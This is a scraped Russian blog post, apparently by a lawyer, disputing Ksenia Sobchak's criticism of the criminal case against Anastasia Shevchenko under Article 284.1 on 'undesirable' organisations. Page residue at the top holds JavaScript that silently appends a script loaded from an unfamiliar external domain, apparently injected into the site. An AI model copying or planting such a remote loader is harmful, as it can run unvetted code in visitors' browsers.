, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

А заблуждается ли Ксения Собчак?

23 Янв

С призывом: «Руки прочь от Анастасии Шевченко!» выступила https://echo.msk.ru/blog/sobchak/2357515-echo/     Ксения Собчак

Печалясь, она  утверждает: «Вот и дожили мы с вами до момента, когда «нежелательными» начали объявлять граждан России! На днях Анастасия Шевченко из Ростова-на-Дону стала фигуранткой первого в России уголовного дела по статье 284.1 — об участии в деятельности нежелательной организации».

СМИ правоохранительных органов  и их официальные представители умалчивают  о законности и обоснованности постановления следователя о привлечении Шевченко к уголовной ответственности по статье 284.1 УК РФ. А всего и надо-то привести текст:

Статья 284.1 УК РФ. Осуществление деятельности на территории Российской Федерации иностранной или международной неправительственной организации, в отношении которой принято решение о признании нежелательной на территории Российской Федерации ее деятельности (введена Федеральным законом от 23.05.2015 N 129-ФЗ).

Руководство деятельностью на территории Российской Федерации иностранной или международной неправительственной организации, в отношении которой принято решение о признании нежелательной на территории Российской Федерации ее деятельности в соответствии с законодательством Российской Федерации, либо участие в такой деятельности, совершенные лицом, которое ранее привлекалось к административной ответственности за аналогичное деяние два раза в течение одного года, — Наказывается…

И разобраться по его содержанию.  При этом  либо утверждать, что Анастасия Шевченко,  руководила деятельностью на территории Российской Федерации иностранной или международной неправительственной организации, в отношении которой принято решение о признании нежелательной на территории Российской Федерации ее деятельности в соответствии с законодательством Российской Федерации, либо  участвовала в такой деятельности.

Это убедит всех, что следствие имеет не просто доказательства, а достаточные доказательства, дающие основания для обвинения Шевченко в их совершении, её  причастности к ним.

При этом никакого предрешений вопроса о  виновности  Шевченко, не будет. Будет только проверка исполнения следователем статьи 171 УПК РФ.

Но  уголовное преследование, а с ней и уголовная ответственность  может наступать только в том случае, если ранее  Шевченко привлекалось к административной ответственности за аналогичное деяние два раза в течение одного года.

Поэтому ещё важно привести доказательства того, что Шевченко   ранее привлекалась административной ответственности за аналогичное деяние два раза в течение одного года.

Ксения утверждает: «она (Шевченко) входит в федеральный совет российской общественной организации «Открытая Россия». Обратите внимание — российской!»

Мне трудно представить, что Ксения не знает о том, что  СМИ ещё 27.04.2017 г сообщали о том, что Минюст объявил нежелательной деятельность «Открытой России» в РФ

https://rg.ru/2017/04/27/miniust-obiavil-nezhelatelnoj-deiatelnost-otkrytoj-rossii-v-rf.html

Об этом были обязаны поведать общественности официальные лица правоохранительных органов, но отмолчались.

И Ксения, наверняка не анализируя статью 284.1 УК РФ,  возмущаясь, говорит: «То, что «нежелательной» (согласно принятому недавно репрессивному закону) можно признать лишь иностранную организацию — ни следователей, ни судей не волнует! Такое впечатление, что им дали команду «фас!» по поводу Михаила Ходорковского и, выслуживаясь, они просто плюют на их свои же законы».

Вот так, молчание тех, кто обязан говорить с обществом,  особенно, если это касается деятельности общественных организаций, приводит к неправомерным возмущениям и заблуждениям тех, кто, вроде бы и за тот самый «обиженный и униженный» народ.

Опять получилось неловко за Ксению.

На мой вопрос https://echo.msk.ru/blog/advokatvladimir/2339875-echo/  : «Зачем Ксения Собчак стремится осуществлять государственную власть?» если не понимает Конституцию России, я ответа так и не получил.

По поводу незнания Конституции России тем, кто хотел стать её гарантом,  мне было стыдно. Но мне кажется, что  Ксения плюёт на свой имидж, если пишет посты, не основанные на правовом анализе действующего законодательства.

Но это и должно заставить более оперативно соответствующие службы правоохранительных органов, приводить  достаточные доказательства, когда они публично  сообщают об обвинении кого-либо в совершении преступления.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.